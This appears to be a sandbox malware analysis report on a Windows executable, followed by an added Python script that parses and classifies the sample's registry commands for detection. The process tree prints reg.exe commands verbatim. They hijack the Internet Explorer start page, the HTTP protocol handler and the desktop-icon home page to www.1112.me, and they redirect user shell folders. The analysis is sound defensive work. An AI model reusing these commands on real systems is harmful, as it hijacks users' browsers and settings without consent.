Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
  • submitted
    24/06/2024, 06:55

General

  • Target

    070ad6bd2fa0d3469ddd5205605e0abf_JaffaCakes118.exe

  • Size

    48KB

  • MD5

    070ad6bd2fa0d3469ddd5205605e0abf

  • SHA1

    3b4e026d9ad1d6b18d1f10872284bdb31774c301

  • SHA256

    d85fc099bd441b7bcacbf8e4461366113acbb54f33ffd7542408b08ea040c53e

  • SHA512

    f4b4f36851348a5a5ba834bdadb1538d2dc1f777c6bab84054a77360d3e80b01d111a22b94aaf18d085644ff1275498cf6a8ff0afa259340dfea39bfaf304876

  • SSDEEP

    768:U9J8NowRheD8/3rJiUqyet8w9abyzm5E50kyoVonvzRiZljBwiwo5sW3LhaNIC4x:U9wvQUreUbyzABq2mLha2OxEN

Score
1/10

Malware Config

Signatures

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies Internet Explorer start page 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 4 IoCs
  • Modifies registry class 12 IoCs
  • Suspicious use of WriteProcessMemory 40 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\070ad6bd2fa0d3469ddd5205605e0abf_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\070ad6bd2fa0d3469ddd5205605e0abf_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2244
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c C:\Users\Admin\AppData\Local\Temp\~D2A.bat "C:\Users\Admin\AppData\Local\Temp\070ad6bd2fa0d3469ddd5205605e0abf_JaffaCakes118.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2396
      • C:\Windows\SysWOW64\reg.exe
        reg delete "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /f
        3⤵
          PID:1756
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.1112.me/?yw" /f
          3⤵
          • Modifies Internet Explorer settings
          • Modifies Internet Explorer start page
          PID:2376
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKEY_USERs\.DEFAULT\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.1112.me/?yw" /f
          3⤵
          • Modifies data under HKEY_USERS
          PID:2388
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKEY_USERs\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.1112.me/?yw" /f
          3⤵
          • Modifies data under HKEY_USERS
          PID:1156
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /v "" /d "C:\Program Files\Internet Explorer\IEXPLORE.EXE www.1112.me/?yw" /f
          3⤵
          • Modifies registry class
          PID:2380
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKEY_CLASSES_ROOT\HTTP\shell\open\command" /v "" /d "C:\Program Files\Internet Explorer\IEXPLORE.EXE www.1112.me/?yw" /f
          3⤵
          • Modifies registry class
          PID:2280
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /v "" /d "C:\Program Files\Internet Explorer\IEXPLORE.EXE www.1112.me/?yw" /f
          3⤵
          • Modifies registry class
          PID:2612
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v "Favorites" /t REG_EXPAND_SZ /d "c:\Documents and Settings\Administrator\Favorites"
          3⤵
            PID:2600
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v "Personal" /t REG_EXPAND_SZ /d "c:\Documents and Settings\Administrator\My Documents"
            3⤵
              PID:2620
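Triage note on the process tree (added commentary; the script below is an added example, not part of the sandbox output). Read together, the reg.exe invocations launched from ~D2A.bat are a self-contained Internet Explorer start-page hijack: the start page is set to http://www.1112.me/?yw for the current user, for the .DEFAULT profile and for the SYSTEM account (S-1-5-18); the HKCR\HTTP\shell\open\command handler is replaced by an IEXPLORE.EXE command line that carries the hijack URL and no %1 placeholder, so an http: link opened through the shell lands on that URL rather than on its target; the OpenHomePage verb of the Internet Explorer desktop-icon CLSID {871C5380-42A0-1069-A2EA-08002B30309D} is redirected the same way, once under HKLM\SOFTWARE\Classes and once under HKCR; and the Favorites and Personal shell folders are repointed at an XP-era c:\Documents and Settings\Administrator path. The Python script below parses those command lines (copied from the tree above as its constructed input), normalises the registry paths so the HKLM\SOFTWARE\Classes and HKCR writes compare equal, classifies each operation into one of four hijack categories and pulls out the hijack host. The category names and the RegOp/Finding structures are this example's own, not sandbox identifiers.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed input: the reg.exe command lines recorded in the process tree
# above. The parser and the rules are an added example, not the sandbox's
# own signature logic.
SAMPLE_CMDLINES = [
    r'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /f',
    r'reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.1112.me/?yw" /f',
    r'reg add "HKEY_USERs\.DEFAULT\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.1112.me/?yw" /f',
    r'reg add "HKEY_USERs\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.1112.me/?yw" /f',
    r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /v "" /d "C:\Program Files\Internet Explorer\IEXPLORE.EXE www.1112.me/?yw" /f',
    r'reg add "HKEY_CLASSES_ROOT\HTTP\shell\open\command" /v "" /d "C:\Program Files\Internet Explorer\IEXPLORE.EXE www.1112.me/?yw" /f',
    r'reg add "HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /v "" /d "C:\Program Files\Internet Explorer\IEXPLORE.EXE www.1112.me/?yw" /f',
    r'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v "Favorites" /t REG_EXPAND_SZ /d "c:\Documents and Settings\Administrator\Favorites"',
    r'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v "Personal" /t REG_EXPAND_SZ /d "c:\Documents and Settings\Administrator\My Documents"',
]

IE_DESKTOP_ICON_CLSID = "{871C5380-42A0-1069-A2EA-08002B30309D}"  # "The Internet" desktop icon
_HIVES = {"HKCU": "HKEY_CURRENT_USER", "HKLM": "HKEY_LOCAL_MACHINE",
          "HKCR": "HKEY_CLASSES_ROOT", "HKU": "HKEY_USERS"}
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')          # Windows-style quoting
_URL = re.compile(r'(?:https?://)?www\.[^\s"]+', re.I)


@dataclass
class RegOp:
    action: str            # "add" or "delete"
    key: str               # upper-case, hive aliases expanded, HKLM\SOFTWARE\Classes folded into HKCR
    value: Optional[str]   # value name; "" is the (Default) value, None means the key itself
    data: Optional[str]
    vtype: Optional[str]


@dataclass
class Finding:
    kind: str              # example's own category name (not a sandbox signature)
    op: RegOp
    host: Optional[str]    # hijack host pulled out of the value data, if any


def tokenize(cmdline: str) -> list:
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in _TOKEN.finditer(cmdline)]


def normalize_key(key: str) -> str:
    hive, _, rest = key.strip("\\").upper().partition("\\")
    hive = _HIVES.get(hive, hive)
    # HKLM\SOFTWARE\Classes is the machine-wide half of HKEY_CLASSES_ROOT.
    if hive == "HKEY_LOCAL_MACHINE" and rest.startswith("SOFTWARE\\CLASSES\\"):
        hive, rest = "HKEY_CLASSES_ROOT", rest[len("SOFTWARE\\CLASSES\\"):]
    return hive + "\\" + rest


def parse_reg(cmdline: str) -> Optional[RegOp]:
    toks = tokenize(cmdline)
    if len(toks) < 3 or toks[0].lower().rsplit("\\", 1)[-1] not in ("reg", "reg.exe"):
        return None
    action = toks[1].lower()
    if action not in ("add", "delete"):
        return None
    op = RegOp(action, normalize_key(toks[2]), None, None, None)
    i = 3
    while i < len(toks):
        flag = toks[i].lower()
        arg = toks[i + 1] if i + 1 < len(toks) else None
        if flag == "/v" and arg is not None:
            op.value, i = arg, i + 2
        elif flag == "/ve":
            op.value, i = "", i + 1
        elif flag == "/d" and arg is not None:
            op.data, i = arg, i + 2
        elif flag == "/t" and arg is not None:
            op.vtype, i = arg.upper(), i + 2
        else:
            i += 1                     # /f, /s, /reg:64 ... not modelled
    return op


_RULES = (
    ("ie_start_page", lambda op: op.key.endswith("\\SOFTWARE\\MICROSOFT\\INTERNET EXPLORER\\MAIN")
                                 and (op.value or "").lower() == "start page"),
    ("http_protocol_handler", lambda op: re.fullmatch(
        r"HKEY_CLASSES_ROOT\\HTTPS?\\SHELL\\OPEN\\COMMAND", op.key) is not None),
    ("ie_desktop_icon_home_page", lambda op: op.key ==
        "HKEY_CLASSES_ROOT\\CLSID\\" + IE_DESKTOP_ICON_CLSID + "\\SHELL\\OPENHOMEPAGE\\COMMAND"),
    ("user_shell_folder_redirect", lambda op: op.key.endswith("\\EXPLORER\\USER SHELL FOLDERS")),
)


def extract_host(data: Optional[str]) -> Optional[str]:
    m = _URL.search(data or "")
    if not m:
        return None
    return re.sub(r"^https?://", "", m.group(0), flags=re.I).split("/", 1)[0].lower()


def scan(cmdlines) -> list:
    """Classify every reg.exe add/delete in cmdlines; one Finding per matching line."""
    findings = []
    for line in cmdlines:
        op = parse_reg(line)
        if op is None:
            continue
        for kind, matches in _RULES:
            if matches(op):
                findings.append(Finding(kind, op, extract_host(op.data)))
                break
    return findings


def summarize(findings) -> tuple:
    """(category -> count, sorted list of distinct hijack hosts)."""
    counts = {}
    for f in findings:
        counts[f.kind] = counts.get(f.kind, 0) + 1
    return counts, sorted({f.host for f in findings if f.host})


if __name__ == "__main__":
    found = scan(SAMPLE_CMDLINES)
    for f in found:
        print(f"{f.kind:28} {f.op.action:6} {f.op.key}  host={f.host}")
    print(summarize(found))
```

On the report's nine command lines this yields four start-page events (the delete plus three adds), one HTTP protocol-handler overwrite, two desktop-icon OpenHomePage overwrites (the HKLM\SOFTWARE\Classes and HKCR writes normalise to the same key) and two User Shell Folders redirects, with www.1112.me as the only host. The same parser runs unchanged over reg.exe command lines from Sysmon event 1 or 4688 logs, where the tokeniser matters more than here because real command lines mix quoted and unquoted arguments.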

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\~D2A.bat

    Filesize

    1KB

    MD5

    6b1d7b12d453bd1eecb11c951973347f

    SHA1

    55e6f5018470b9041ebd70ed7d7c69d764c1cd9d

    SHA256

    8624d2e78872e385d249dc42c1893a04915eccc2e7e78e6f4b8fc7332a96c072

    SHA512

    1aa614fdbc5b15507f6b292cb50602014a842f9fbe62c1ce9e512e3d9ecd395c8fc61033ecb1fa860ea53924b18bd01d395123393863f72581faf3e5c61ef117

  • memory/2244-3-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB